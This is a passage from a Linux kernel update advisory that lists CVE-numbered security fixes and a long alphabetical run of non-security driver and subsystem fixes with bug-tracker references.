(bsc#1257687).\n- CVE-2025-71225: md: suspend array while updating raid_disks via sysfs (bsc#1258411).\n- CVE-2026-22976: net/sched: sch_qfq: Fix NULL deref when deactivating inactive aggregate in qfq_reset (bsc#1257035).\n- CVE-2026-22977: net: sock: fix hardened usercopy panic in sock_recv_errqueue (bsc#1257053).\n- CVE-2026-22979: net: fix memory leak in skb_segment_list for GRO packets (bsc#1257228).\n- CVE-2026-22982: net: mscc: ocelot: Fix crash when adding interface under a lag (bsc#1257179).\n- CVE-2026-22984: libceph: prevent potential out-of-bounds reads in handle_auth_done() (bsc#1257217).\n- CVE-2026-22990: libceph: replace overzealous BUG_ON in osdmap_apply_incremental() (bsc#1257221).\n- CVE-2026-22991: libceph: make free_choose_arg_map() resilient to partial allocation (bsc#1257220).\n- CVE-2026-22992: libceph: return the handler error from mon_handle_auth_done() (bsc#1257218).\n- CVE-2026-22996: net/mlx5e: Don\u0027t store mlx5e_priv in mlx5e_dev devlink priv.\n- CVE-2026-22998: nvme-tcp: fix NULL pointer dereferences in nvmet_tcp_build_pdu_iovec (bsc#1257209).\n- CVE-2026-22999: net/sched: sch_qfq: do not free existing class in qfq_change_class() (bsc#1257236).\n- CVE-2026-23000: net/mlx5e: Fix crash on profile change rollback failure (bsc#1257234).\n- CVE-2026-23001: macvlan: Use \u0027hash\u0027 iterators to simplify code (bsc#1257232).\n- CVE-2026-23003: geneve: Fix incorrect inner network header offset when innerprotoinherit is set (bsc#1257246).\n- CVE-2026-23004: dst: fix races in rt6_uncached_list_del() and rt_del_uncached_list() (bsc#1257231).\n- CVE-2026-23005: x86/fpu: Clear XSTATE_BV in guest XSAVE state whenever XFD[i]=1 (bsc#1257245).\n- CVE-2026-23010: ipv6: Fix use-after-free in inet6_addr_del() (bsc#1257332).\n- CVE-2026-23011: ipv4: ip_gre: make ipgre_header() robust (bsc#1257207).\n- CVE-2026-23017: idpf: fix error handling in the init_task on load (bsc#1257552).\n- CVE-2026-23035: net/mlx5e: Pass netdev to mlx5e_destroy_netdev instead of priv (bsc#1257559).\n- CVE-2026-23053: NFS: Fix a deadlock involving nfs_release_folio() (bsc#1257718).\n- CVE-2026-23057: vsock/virtio: Coalesce only linear skb (bsc#1257740).\n- CVE-2026-23060: crypto: authencesn - reject too-short AAD (assoclen\u003c8) to match ESP/ESN spec (bsc#1257735).\n- CVE-2026-23064: net/sched: act_ife: avoid possible NULL deref (bsc#1257765).\n- CVE-2026-23074: net/sched: Enforce that teql can only be used as root qdisc (bsc#1257749).\n- CVE-2026-23083: fou: Don\u0027t allow 0 for FOU_ATTR_IPPROTO (bsc#1257745).\n- CVE-2026-23084: be2net: Fix NULL pointer dereference in be_cmd_get_mac_from_list (bsc#1257830).\n- CVE-2026-23085: irqchip/gic-v3-its: Avoid truncating memory addresses (bsc#1257758).\n- CVE-2026-23086: vsock/virtio: cap TX credit to local buffer size (bsc#1257757).\n- CVE-2026-23089: ALSA: usb-audio: Fix use-after-free in snd_usb_mixer_free() (bsc#1257790).\n- CVE-2026-23095: gue: Fix skb memleak with inner IP protocol 0 (bsc#1257808).\n- CVE-2026-23099: bonding: limit BOND_MODE_8023AD to Ethernet devices (bsc#1257816).\n- CVE-2026-23102: arm64/fpsimd: signal: Mandate SVE payload for streaming-mode state (bsc#1257772).\n- CVE-2026-23104: ice: fix devlink reload call trace (bsc#1257763).\n- CVE-2026-23105: net/sched: qfq: Use cl_is_active to determine whether class is active in qfq_rm_from_ag (bsc#1257775).\n- CVE-2026-23107: arm64/fpsimd: signal: Allocate SSVE storage when restoring ZA (bsc#1257762).\n- CVE-2026-23110: scsi: core: Wake up the error handler when final completions race against each other (bsc#1257761).\n- CVE-2026-23111: netfilter: nf_tables: fix inverted genmask check in nft_map_catchall_activate() (bsc#1258181).\n- CVE-2026-23112: nvmet-tcp: add bounds checks in nvmet_tcp_build_pdu_iovec (bsc#1258184).\n- CVE-2026-23113: io_uring/io-wq: check IO_WQ_BIT_EXIT inside work run loop (bsc#1258278).\n- CVE-2026-23116: pmdomain: imx8m-blk-ctrl: Remove separate rst and clk mask for 8mq vpu (bsc#1258277).\n- CVE-2026-23119: bonding: provide a net pointer to __skb_flow_dissect() (bsc#1258273).\n- CVE-2026-23139: netfilter: nf_conncount: update last_gc only when GC has been performed (bsc#1258304).\n- CVE-2026-23141: btrfs: send: check for inline extents in range_is_hole_in_parent() (bsc#1258377).\n- CVE-2026-23166: ice: Fix NULL pointer dereference in ice_vsi_set_napi_queues (bsc#1258272).\n- CVE-2026-23171: net: bonding: update the slave array for broadcast mode (bsc#1258349).\n- CVE-2026-23173: net/mlx5e: TC, delete flows only for existing peers (bsc#1258520).\n- CVE-2026-23179: nvmet-tcp: fixup hang in nvmet_tcp_listen_data_ready() (bsc#1258394).\n- CVE-2026-23191: ALSA: aloop: Fix racy access at PCM trigger (bsc#1258395).\n- CVE-2026-23198: KVM: Don\u0027t clobber irqfd routing type when deassigning irqfd (bsc#1258321).\n- CVE-2026-23208: ALSA: usb-audio: Prevent excessive number of frames (bsc#1258468).\n- CVE-2026-23209: macvlan: fix error recovery in macvlan_common_newlink() (bsc#1258518).\n- CVE-2026-23213: drm/amd/pm: Disable MMIO access during SMU Mode 1 reset (bsc#1258465).\n- CVE-2026-23214: btrfs: reject new transactions if the fs is fully read-only (bsc#1258464).\n\nThe following non-security bugs were fixed:\n\n- ACPI: CPPC: Fix missing PCC check for guaranteed_perf (git-fixes).\n- ACPI: CPPC: Fix remaining for_each_possible_cpu() to use online CPUs (git-fixes).\n- ACPI: PCC: Fix race condition by removing static qualifier (git-fixes).\n- ACPI: PM: Add unused power resource quirk for THUNDEROBOT ZERO (git-fixes).\n- ACPI: processor: Fix NULL-pointer dereference in acpi_processor_errata_piix4() (stable-fixes).\n- ACPI: processor_core: fix map_x2apic_id for amd-pstate on am4 (git-fixes).\n- ACPI: property: Fix fwnode refcount leak in acpi_fwnode_graph_parse_endpoint() (git-fixes).\n- ACPI: property: Use ACPI functions in acpi_graph_get_next_endpoint() only (stable-fixes).\n- ACPICA: Abort AML bytecode execution when executing AML_FATAL_OP (stable-fixes).\n- ACPICA: Avoid walking the Namespace if start_node is NULL (stable-fixes).\n- ACPICA: Fix NULL pointer dereference in acpi_ev_address_space_dispatch() (git-fixes).\n- ALSA: ac97: fix a double free in snd_ac97_controller_register() (git-fixes).\n- ALSA: ctxfi: Fix potential OOB access in audio mixer handling (stable-fixes).\n- ALSA: dice: fix buffer overflow in detect_stream_formats() (git-fixes).\n- ALSA: firewire-motu: add bounds check in put_user loop for DSP events (git-fixes).\n- ALSA: firewire-motu: fix buffer overflow in hwdep read for DSP events (git-fixes).\n- ALSA: hda/conexant: Add headset mic fix for MECHREVO Wujie 15X Pro (stable-fixes).\n- ALSA: hda/realtek - fixed speaker no sound (stable-fixes).\n- ALSA: hda/realtek: Add quirk for Inspur S14-G1 (stable-fixes).\n- ALSA: hda/realtek: Fix headset mic for TongFang X6AR55xU (stable-fixes).\n- ALSA: hda/realtek: Really fix headset mic for TongFang X6AR55xU (git-fixes).\n- ALSA: hda/realtek: add HP Laptop 15s-eq1xxx mute LED quirk (stable-fixes).\n- ALSA: hda/realtek: fix right sounds and mute/micmute LEDs for HP machine (stable-fixes).\n- ALSA: hda: cs35l41: Fix NULL pointer dereference in cs35l41_hda_read_acpi() (git-fixes).\n- ALSA: pcmcia: Fix resource leak in snd_pdacf_probe error path (git-fixes).\n- ALSA: scarlett2: Fix buffer overflow in config retrieval (git-fixes).\n- ALSA: uapi: Fix typo in asound.h comment (git-fixes).\n- ALSA: usb-audio: Add DSD quirk for LEAK Stereo 230 (stable-fixes).\n- ALSA: usb-audio: Add iface reset and delay quirk for AB13X USB Audio (stable-fixes).\n- ALSA: usb-audio: Add native DSD quirks for PureAudio DAC series (stable-fixes).\n- ALSA: usb-audio: Add sanity check for OOB writes at silencing (stable-fixes).\n- ALSA: usb-audio: Avoid implicit feedback mode on DIYINHK USB Audio 2.0 (stable-fixes).\n- ALSA: usb-audio: Cap the packet size pre-calculations (git-fixes).\n- ALSA: usb-audio: Check max frame size for implicit feedback mode, too (stable-fixes).\n- ALSA: usb-audio: Fix use-after-free in snd_usb_mixer_free() (git-fixes).\n- ALSA: usb-audio: Remove VALIDATE_RATES quirk for Focusrite devices (git-fixes).\n- ALSA: usb-audio: Update for native DSD support quirks (stable-fixes).\n- ALSA: usb-audio: Update the number of packets properly at receiving (stable-fixes).\n- ALSA: usb-audio: Use correct version for UAC3 header validation (git-fixes).\n- ALSA: usb-audio: Use inclusive terms (git-fixes).\n- ALSA: usb-audio: fix broken logic in snd_audigy2nx_led_update() (git-fixes).\n- ALSA: usb-mixer: us16x08: validate meter packet indices (git-fixes).\n- ALSA: usb: Increase volume range that triggers a warning (git-fixes).\n- ALSA: vxpocket: Fix resource leak in vxpocket_probe error path (git-fixes).\n- APEI/GHES: ensure that won\u0027t go past CPER allocated record (stable-fixes).\n- ASoC: Intel: catpt: Fix error path in hw_params() (git-fixes).\n- ASoC: Intel: sof_es8336: Add DMI quirk for Huawei BOD-WXX9 (stable-fixes).\n- ASoC: Intel: sof_es8336: fix headphone GPIO logic inversion (git-fixes).\n- ASoC: SOF: ipc4-control: If there is no data do not send bytes update (git-fixes).\n- ASoC: SOF: ipc4-control: Keep the payload size up to date (git-fixes).\n- ASoC: SOF: ipc4-control: Use the correct size for scontrol-\u003eipc_control_data (git-fixes).\n- ASoC: SOF: ipc4-topology: Correct the allocation size for bytes controls (git-fixes).\n- ASoC: ak4458: Disable regulator when error happens (git-fixes).\n- ASoC: ak5558: Disable regulator when error happens (git-fixes).\n- ASoC: amd: drop unused Kconfig symbols (git-fixes).\n- ASoC: amd: fix memory leak in acp3x pdm dma ops (git-fixes).\n- ASoC: amd: yc: Add ASUS ExpertBook PM1503CDA to quirks list (stable-fixes).\n- ASoC: amd: yc: Add DMI quirk for ASUS Vivobook Pro 15X M6501RR (stable-fixes).\n- ASoC: amd: yc: Add DMI quirk for Acer TravelMate P216-41-TCO (stable-fixes).\n- ASoC: amd: yc: Add quirk for HP 200 G2a 16 (stable-fixes).\n- ASoC: amd: yc: Add quirk for Honor MagicBook X16 2025 (stable-fixes).\n- ASoC: amd: yc: Fix microphone on ASUS M6500RE (stable-fixes).\n- ASoC: bcm: bcm63xx-pcm-whistler: Check return value of of_dma_configure() (git-fixes).\n- ASoC: codecs: max98390: Check return value of devm_gpiod_get_optional() in max98390_i2c_probe() (stable-fixes).\n- ASoC: codecs: wcd938x: fix OF node leaks on probe failure (git-fixes).\n- ASoC: codecs: wsa881x: Drop unused version readout (stable-fixes).\n- ASoC: codecs: wsa881x: fix unnecessary initialisation (git-fixes).\n- ASoC: codecs: wsa883x: fix unnecessary initialisation (git-fixes).\n- ASoC: codecs: wsa884x: fix codec initialisation (git-fixes).\n- ASoC: cs35l45: Corrects ASP_TX5 DAPM widget channel (stable-fixes).\n- ASoC: davinci-evm: Fix reference leak in davinci_evm_probe (stable-fixes).\n- ASoC: fsl: imx-card: Do not force slot width to sample width (git-fixes).\n- ASoC: fsl_sai: Add missing registers to cache default (stable-fixes).\n- ASoC: fsl_xcvr: clear the channel status control memory (git-fixes).\n- ASoC: nau8821: Avoid unnecessary blocking in IRQ handler (stable-fixes).\n- ASoC: nau8821: Cancel delayed work on component remove (git-fixes).\n- ASoC: nau8821: Cancel pending work before suspend (git-fixes).\n- ASoC: nau8821: Consistently clear interrupts before unmasking (git-fixes).\n- ASoC: nau8821: Fixup nau8821_enable_jack_detect() (git-fixes).\n- ASoC: pxa: drop unused Kconfig symbol (git-fixes).\n- ASoC: qcom: q6adm: the the copp device only during last instance (git-fixes).\n- ASoC: qcom: q6apm-dai: set flags to reflect correct operation of appl_ptr (git-fixes).\n- ASoC: qcom: q6asm-dai: perform correct state check before closing (git-fixes).\n- ASoC: qcom: qdsp6: q6asm-dai: set 10 ms period and buffer alignment (git-fixes).\n- ASoC: rockchip: i2s-tdm: Use param rate if not provided by set_sysclk (git-fixes).\n- ASoC: stm32: sai: fix OF node leak on probe (git-fixes).\n- ASoC: stm32: sai: fix clk prepare imbalance on probe failure (git-fixes).\n- ASoC: stm32: sai: fix device leak on probe (git-fixes).\n- ASoC: sun4i-spdif: Add missing kerneldoc fields for sun4i_spdif_quirks (git-fixes).\n- ASoC: sunxi: sun50i-dmic: Add missing check for devm_regmap_init_mmio (stable-fixes).\n- ASoC: tlv320adcx140: Propagate error codes during probe (stable-fixes).\n- ASoC: tlv320adcx140: fix null pointer (git-fixes).\n- ASoC: tlv320adcx140: fix word length (git-fixes).\n- ASoC: wm8962: Add WM8962_ADC_MONOMIX to \"3D Coefficients\" mask (stable-fixes).\n- ASoC: wm8962: Do not report a microphone if it\u0027s shorted to ground on plug (stable-fixes).\n- Add dtb-spacemit SpacemiT boards include MilkV-Jupiter, Banana Pi F3 and Orange Pi RV2.\n- Bluetooth: HCI: Fix tracking of advertisement set/instance 0x00 (git-fixes).\n- Bluetooth: L2CAP: Fix invalid response to L2CAP_ECRED_RECONF_REQ (git-fixes).\n- Bluetooth: L2CAP: Fix missing key size check for L2CAP_LE_CONN_REQ (git-fixes).\n- Bluetooth: L2CAP: Fix not checking output MTU is acceptable on L2CAP_ECRED_CONN_REQ (git-fixes).\n- Bluetooth: L2CAP: Fix response to L2CAP_ECRED_CONN_REQ (git-fixes).\n- Bluetooth: MGMT: Fix memory leak in set_ssp_complete (git-fixes).\n- Bluetooth: SMP: Fix not generating mackey and ltk when repairing (git-fixes).\n- Bluetooth: btrtl: Avoid loading the config file on security chips (stable-fixes).\n- Bluetooth: btusb: Add USB ID 7392:e611 for Edimax EW-7611UXB (stable-fixes).\n- Bluetooth: btusb: Add device ID for Realtek RTL8761BU (stable-fixes).\n- Bluetooth: btusb: Add new VID/PID 13d3/3533 for RTL8821CE (stable-fixes).\n- Bluetooth: btusb: Add new VID/PID 2b89/6275 for RTL8761BUV (stable-fixes).\n- Bluetooth: btusb: Add new VID/PID for RTL8852CE (stable-fixes).\n- Bluetooth: btusb: revert use of devm_kzalloc in btusb (git-fixes).\n- Bluetooth: hci_conn: Set link_policy on incoming ACL connections (stable-fixes).\n- Bluetooth: hci_conn: use mod_delayed_work for active mode timeout (stable-fixes).\n- Bluetooth: hci_qca: Cleanup on all setup failures (git-fixes).\n- Bluetooth: hci_sock: Prevent race in socket write iter and sock bind (git-fixes).\n- Bluetooth: hci_uart: fix null-ptr-deref in hci_uart_write_work (git-fixes).\n- Documentation/kernel-parameters: fix typo in retbleed= kernel parameter description (git-fixes).\n- Documentation: PCI: endpoint: Fix ntb/vntb copy \u0026 paste errors (git-fixes).\n- Documentation: hid-alps: Fix packet format section headings (git-fixes).\n- Documentation: mailbox: mbox_chan_ops.flush() is optional (git-fixes).\n- Documentation: parport-lowlevel: Separate function listing code blocks (git-fixes).\n- HID: Apply quirk HID_QUIRK_ALWAYS_POLL to Edifier QR30 (2d99:a101) (stable-fixes).\n- HID: apple: Add \"SONiX KN85 Keyboard\" to the list of non-apple keyboards (stable-fixes).\n- HID: apple: Add SONiX AK870 PRO to non_apple_keyboards quirk list (stable-fixes).\n- HID: elecom: Add support for ELECOM HUGE Plus M-HT1MRBK (stable-fixes).\n- HID: elecom: Add support for ELECOM M-XT3URBK (018F) (stable-fixes).\n- HID: hid-input: Extend Elan ignore battery quirk to USB (stable-fixes).\n- HID: hid-pl: handle probe errors (git-fixes).\n- HID: i2c-hid: fix potential buffer overflow in i2c_hid_get_report() (stable-fixes).\n- HID: input: map HID_GD_Z to ABS_DISTANCE for stylus/pen (stable-fixes).\n- HID: intel-ish-hid: Reset enum_devices_done before enumeration (stable-fixes).\n- HID: intel-ish-hid: Update ishtp bus match to support device ID table (stable-fixes).\n- HID: logitech-dj: Remove duplicate error logging (git-fixes).\n- HID: logitech-hidpp: Check maxfield in hidpp_get_report_length() (stable-fixes).\n- HID: logitech-hidpp: Do not assume FAP in hidpp_send_message_sync() (git-fixes).\n- HID: magicmouse: Do not crash on missing msc-\u003einput (stable-fixes).\n- HID: multitouch: add MT_QUIRK_STICKY_FINGERS to MT_CLS_VTL (stable-fixes).\n- HID: multitouch: add eGalaxTouch EXC3188 support (stable-fixes).\n- HID: playstation: Add missing check for input_ff_create_memless (git-fixes).\n- HID: playstation: Center initial joystick axes to prevent spurious events (stable-fixes).\n- HID: prodikeys: Check presence of pm-\u003einput_ep82 (stable-fixes).\n- HID: quirks: Add another Chicony HP 5MP Cameras to hid_ignore_list (stable-fixes).\n- HID: quirks: work around VID/PID conflict for appledisplay (git-fixes).\n- HID: usbhid: paper over wrong bNumDescriptor field (stable-fixes).\n- Input: atkbd - skip deactivate for HONOR FMB-P\u0027s internal keyboard (git-fixes).\n- Input: cros_ec_keyb - fix an invalid memory access (stable-fixes).\n- Input: goodix - add support for ACPI ID GDIX1003 (stable-fixes).\n- Input: goodix - add support for ACPI ID GDX9110 (stable-fixes).\n- Input: i8042 - add TUXEDO InfinityBook Max Gen10 AMD to i8042 quirk table (stable-fixes).\n- Input: i8042 - add quirk for ASUS Zenbook UX425QA_UM425QA (stable-fixes).\n- Input: i8042 - add quirks for MECHREVO Wujie 15X Pro (stable-fixes).\n- Input: stmfts - correct wording for the warning message (git-fixes).\n- Input: stmfts - make comments correct (git-fixes).\n- Input: ti_am335x_tsc - fix off-by-one error in wire_order validation (git-fixes).\n- KEYS: trusted: Fix a memory leak in tpm2_load_cmd (git-fixes).\n- KEYS: trusted_tpm1: Compare HMAC values in constant time (git-fixes).\n- Move upstreamed SCSI patches into sorted section\n- Move upstreamed ath12k patch into sorted section\n- Move upstreamed mm and SCSI patches into sorted section\n- NTB: ntb_transport: Fix too small buffer for debugfs_name (git-fixes).\n- PCI/ACPI: Restrict program_hpx_type2() to AER bits (git-fixes).\n- PCI/IOV: Fix race between SR-IOV enable/disable and hotplug (git-fixes).\n- PCI/MSI: Unmap MSI-X region on error (stable-fixes).\n- PCI/P2PDMA: Release per-CPU pgmap ref when vm_insert_page() fails (git-fixes).\n- PCI/PM: Avoid redundant delays on D3hot-\u003eD3cold (git-fixes).\n- PCI/PM: Reinstate clearing state_saved in legacy and !PM codepaths (git-fixes).\n- PCI/portdrv: Fix potential resource leak (git-fixes).\n- PCI: Add ACS quirk for Pericom PI7C9X2G404 switches [12d8:b404] (git-fixes).\n- PCI: Add ACS quirk for Qualcomm Hamoa \u0026 Glymur (stable-fixes).\n- PCI: Add PCIE_MSG_CODE_ASSERT_INTx message macros (stable-fixes).\n- PCI: Add defines for bridge window indexing (stable-fixes).\n- PCI: Correct PCI_CAP_EXP_ENDPOINT_SIZEOF_V2 value (git-fixes).\n- PCI: Do not attempt to set ExtTag for VFs (git-fixes).\n- PCI: Enable ACS after configuring IOMMU for OF platforms (stable-fixes).\n- PCI: Fix pci_slot_lock () device locking (stable-fixes).\n- PCI: Fix pci_slot_trylock() error handling (git-fixes).\n- PCI: Initialize RCB from pci_configure_device() (git-fixes).\n- PCI: Log bridge info when first enumerating bridge (stable-fixes).\n- PCI: Log bridge windows conditionally (stable-fixes).\n- PCI: Mark 3ware-9650SA Root Port Extended Tags as broken (git-fixes).\n- PCI: Mark ASM1164 SATA controller to avoid bus reset (stable-fixes).\n- PCI: Mark Nvidia GB10 to avoid bus reset (stable-fixes).\n- PCI: Move pci_read_bridge_windows() below individual window accessors (stable-fixes).\n- PCI: Supply bridge device, not secondary bus, to read window details (stable-fixes).\n- PCI: dw-rockchip: Disable BAR 0 and BAR 1 for Root Port (stable-fixes).\n- PCI: dwc: Fix wrong PORT_LOGIC_LTSSM_STATE_MASK definition (git-fixes).\n- PCI: endpoint: Fix swapped parameters in pci_{primary/secondary}_epc_epf_unlink() functions (git-fixes).\n- PCI: keystone: Exit ks_pcie_probe() for invalid mode (git-fixes).\n- PCI: mediatek: Fix IRQ domain leak when MSI allocation fails (git-fixes).\n- PCI: rcar-gen2: Drop ARM dependency from PCI_RCAR_GEN2 (git-fixes).\n- PM: runtime: Do not clear needs_force_resume with enabled runtime PM (git-fixes).\n- PM: sleep: wakeirq: Update outdated documentation comments (git-fixes).\n- PM: sleep: wakeirq: harden dev_pm_clear_wake_irq() against races (git-fixes).\n- PM: wakeup: Handle empty list in wakeup_sources_walk_start() (git-fixes).\n- USB: Fix descriptor count when handling invalid MBIM extended descriptor (git-fixes).\n- USB: OHCI/UHCI: Add soft dependencies on ehci_platform (stable-fixes).\n- USB: lpc32xx_udc: Fix error handling in probe (git-fixes).\n- USB: serial: belkin_sa: fix TIOCMBIS and TIOCMBIC (git-fixes).\n- USB: serial: ftdi_sio: add support for PICAXE AXE027 cable (stable-fixes).\n- USB: serial: ftdi_sio: add support for u-blox EVK-M101 (stable-fixes).\n- USB: serial: ftdi_sio: match on interface number for jtag (stable-fixes).\n- USB: serial: kobil_sct: fix TIOCMBIS and TIOCMBIC (git-fixes).\n- USB: serial: option: add Foxconn T99W760 (stable-fixes).\n- USB: serial: option: add Quectel RG255C (stable-fixes).\n- USB: serial: option: add Telit Cinterion FE910C04 new compositions (stable-fixes).\n- USB: serial: option: add Telit FN920C04 ECM compositions (stable-fixes).\n- USB: serial: option: add Telit FN920C04 RNDIS compositions (stable-fixes).\n- USB: serial: option: add Telit LE910 MBIM composition (stable-fixes).\n- USB: serial: option: add UNISOC UIS7720 (stable-fixes).\n- USB: serial: option: add support for Rolling RW101R-GL (stable-fixes).\n- USB: serial: option: move Telit 0x10c7 composition in the right place (stable-fixes).\n- USB: storage: Remove subclass and protocol overrides from Novatek quirk (git-fixes).\n- Update config files: disable CONFIG_DEVPORT for arm64 (bsc#1256792)\n- Workaround for hybrid git workflow in SLFO 1.0/1.1\n- arm64: zynqmp: Fix usb node drive strength and slew rate (git-fixes)\n- arm64: zynqmp: Revert usb node drive strength and slew rate for (git-fixes)\n- ata: libata: Add cpr_log to ata_dev_print_features() early return (git-fixes).\n- ata: libata: avoid long timeouts on hot-unplugged SATA DAS (stable-fixes).\n- ata: pata_ftide010: Fix some DMA timings (git-fixes).\n- atm/fore200e: Fix possible data race in fore200e_open() (git-fixes).\n- atm: Fix dma_free_coherent() size (git-fixes).\n- atm: fore200e: fix use-after-free in tasklets during device removal (git-fixes).\n- atm: idt77252: Add missing `dma_map_error()` (stable-fixes).\n- auxdisplay: arm-charlcd: fix release_mem_region() size (git-fixes).\n- backlight: led-bl: Add devlink to supplier LEDs (git-fixes).\n- backlight: lp855x: Fix lp855x.h kernel-doc warnings (git-fixes).\n- backlight: qcom-wled: Change PM8950 WLED configurations (git-fixes).\n- backlight: qcom-wled: Support ovp values for PMI8994 (git-fixes).\n- bonding: only set speed/duplex to unknown, if getting speed failed (bsc#1253691).\n- bpf/selftests: test_select_reuseport_kern: Remove unused header (bsc#1257603).\n- bpf: Do not let BPF test infra emit invalid GSO types to stack (bsc#1255569).\n- bpf: Reject bpf_timer for PREEMPT_RT (git-fixes).\n- broadcom: b44: prevent uninitialized value usage (git-fixes).\n- bs-upload-kernel: Fix cve branch uploads\n- btrfs: do not strictly require dirty metadata threshold for metadata writepages (stable-fixes).\n- btrfs: make sure extent and csum paths are always released in scrub_raid56_parity_stripe() (git-fixes).\n- btrfs: scrub: always update btrfs_scrub_progress::last_physical (git-fixes).\n- bus: fsl-mc: Replace snprintf and sprintf with sysfs_emit in sysfs show functions (stable-fixes).\n- bus: fsl-mc: fix an error handling in fsl_mc_device_add() (git-fixes).\n- bus: fsl-mc: fix use-after-free in driver_override_show() (git-fixes).\n- can: ctucanfd: fix SSP_SRC in cases when bit-rate is higher than 1 MBit (git-fixes).\n- can: ems_usb: ems_usb_read_bulk_callback(): fix URB memory leak (git-fixes).\n- can: etas_es58x: allow partial RX URB allocation to succeed (git-fixes).\n- can: gs_usb: gs_can_open(): fix error handling (git-fixes).\n- can: gs_usb: gs_usb_receive_bulk_callback(): fix error message (git-fixes).\n- can: gs_usb: gs_usb_receive_bulk_callback(): unanchor URL on usb_submit_urb() error (git-fixes).\n- can: gs_usb: gs_usb_xmit_callback(): fix handling of failed transmitted URBs (git-fixes).\n- can: j1939: make j1939_session_activate() fail if device is no longer registered (stable-fixes).\n- can: j1939: make j1939_sk_bind() fail if device is no longer registered (git-fixes).\n- can: kvaser_usb: kvaser_usb_read_bulk_callback(): fix URB memory leak (git-fixes).\n- can: kvaser_usb: leaf: Fix potential infinite loop in command parsers (git-fixes).\n- can: mcba_usb: mcba_usb_read_bulk_callback(): fix URB memory leak (git-fixes).\n- can: sja1000: fix max irq loop handling (git-fixes).\n- can: sun4i_can: sun4i_can_interrupt(): fix max irq loop handling (git-fixes).\n- can: usb_8dev: usb_8dev_read_bulk_callback(): fix URB memory leak (git-fixes).\n- char: applicom: fix NULL pointer dereference in ac_ioctl (stable-fixes).\n- char: tpm: cr50: Remove IRQF_ONESHOT (stable-fixes).\n- cifs: Fix copy offload to flush destination region (bsc#1252511).\n- cifs: Fix flushing, invalidation and file size with copy_file_range() (bsc#1252511).\n- cifs: Fix uncached read into ITER_KVEC iterator (bsc#1245449).\n- cifs: add new field to track the last access time of cfid (git-fixes).\n- cifs: add xid to query server interface call (git-fixes).\n- cifs: after disabling multichannel, mark tcon for reconnect (git-fixes).\n- cifs: avoid redundant calls to disable multichannel (git-fixes).\n- cifs: cifs_pick_channel should try selecting active channels (git-fixes).\n- cifs: deal with the channel loading lag while picking channels (git-fixes).\n- cifs: dns resolution is needed only for primary channel (git-fixes).\n- cifs: do not disable interface polling on failure (git-fixes).\n- cifs: do not search for channel if server is terminating (git-fixes).\n- cifs: fix a pending undercount of srv_count (git-fixes).\n- cifs: fix lock ordering while disabling multichannel (git-fixes).\n- cifs: fix stray unlock in cifs_chan_skip_or_disable (git-fixes).\n- cifs: fix use after free for iface while disabling secondary channels (git-fixes).\n- cifs: handle servers that still advertise multichannel after disabling (git-fixes).\n- cifs: handle when server starts supporting multichannel (git-fixes).\n- cifs: handle when server stops supporting multichannel (git-fixes).\n- cifs: make cifs_chan_update_iface() a void function (git-fixes).\n- cifs: make sure server interfaces are requested only for SMB3+ (git-fixes).\n- cifs: make sure that channel scaling is done only once (git-fixes).\n- cifs: reconnect worker should take reference on server struct unconditionally (git-fixes).\n- cifs: reset connections for all channels when reconnect requested (git-fixes).\n- cifs: reset iface weights when we cannot find a candidate (git-fixes).\n- cifs: serialize other channels when query server interfaces is pending (git-fixes).\n- cifs: update dstaddr whenever channel iface is updated (git-fixes).\n- clk: clk-apple-nco: Add \"apple,t8103-nco\" compatible (git-fixes).\n- clk: mediatek: Fix error handling in runtime PM setup (git-fixes).\n- clk: meson: g12a: Limit the HDMI PLL OD to /4 (git-fixes).\n- clk: meson: gxbb: Limit the HDMI PLL OD to /4 on GXL/GXM SoCs (git-fixes).\n- clk: qcom: camcc-sm6350: Fix PLL config of PLL2 (git-fixes).\n- clk: qcom: camcc-sm6350: Specify Titan GDSC power domain as a parent to other (git-fixes).\n- clk: qcom: dispcc-sdm845: Enable parents for pixel clocks (git-fixes).\n- clk: qcom: gcc-msm8917: Remove ALWAYS_ON flag from cpp_gdsc (git-fixes).\n- clk: qcom: gcc-msm8953: Remove ALWAYS_ON flag from cpp_gdsc (git-fixes).\n- clk: qcom: gfx3d: add parent to parent request map (git-fixes).\n- clk: qcom: rcg2: compute 2d using duty fraction directly (git-fixes).\n- clk: renesas: cpg-mssr: Add missing 1ms delay into reset toggle callback (git-fixes).\n- clk: renesas: r9a06g032: Fix memory leak in error path (git-fixes).\n- clk: renesas: rzg2l: Fix intin variable size (git-fixes).\n- clk: renesas: rzg2l: Select correct div round macro (git-fixes).\n- clk: tegra: tegra124-emc: Fix potential memory leak in tegra124_clk_register_emc() (git-fixes).\n- clk: tegra: tegra124-emc: fix device leak on set_rate() (git-fixes).\n- clocksource: Print durations for sync check unconditionally (bsc#1241345).\n- clocksource: Reduce watchdog readout delay limit to prevent false positives (bsc#1241345).\n- comedi: Fix getting range information for subdevices 16 to 255 (git-fixes).\n- comedi: c6xdigio: Fix invalid PNP driver unregistration (git-fixes).\n- comedi: check device\u0027s attached status in compat ioctls (git-fixes).\n- comedi: dmm32at: serialize use of paged registers (git-fixes).\n- comedi: fix divide-by-zero in comedi_buf_munge() (stable-fixes).\n- comedi: multiq3: sanitize config options in multiq3_attach() (git-fixes).\n- comedi: pcl818: fix null-ptr-deref in pcl818_ai_cancel() (git-fixes).\n- cpufreq: intel_pstate: Check IDA only before MSR_IA32_PERF_CTL writes (git-fixes).\n- cpuidle: menu: Use residency threshold in polling state override decisions (bsc#1255026).\n- crypto: asymmetric_keys - prevent overflow in asymmetric_key_generate_id (git-fixes).\n- crypto: authenc - Correctly pass EINPROGRESS back up to the caller (git-fixes).\n- crypto: authencesn - reject too-short AAD (assoclen\u0026lt;8) to match ESP/ESN spec (git-fixes).\n- crypto: cavium - fix dma_free_coherent() size (git-fixes).\n- crypto: ccp - Add an S4 restore flow (git-fixes).\n- crypto: ccree - Correctly handle return of sg_nents_for_len (git-fixes).\n- crypto: hisilicon/qm - restore original qos values (git-fixes).\n- crypto: hisilicon/sec2 - support skcipher/aead fallback for hardware queue unavailable (git-fixes).\n- crypto: iaa - Fix incorrect return value in save_iaa_wq() (git-fixes).\n- crypto: iaa - Fix out-of-bounds index in find_empty_iaa_compression_mode (git-fixes).\n- crypto: octeontx - Fix length check to avoid truncation in ucode_load_store (git-fixes).\n- crypto: octeontx - fix dma_free_coherent() size (git-fixes).\n- crypto: omap - Allocate OMAP_CRYPTO_FORCE_COPY scatterlists correctly (git-fixes).\n- crypto: qat - fix duplicate restarting msg during AER error (git-fixes).\n- crypto: qat - fix parameter order used in ICP_QAT_FW_COMN_FLAGS_BUILD (git-fixes).\n- crypto: qat - fix warning on adf_pfvf_pf_proto.c (git-fixes).\n- 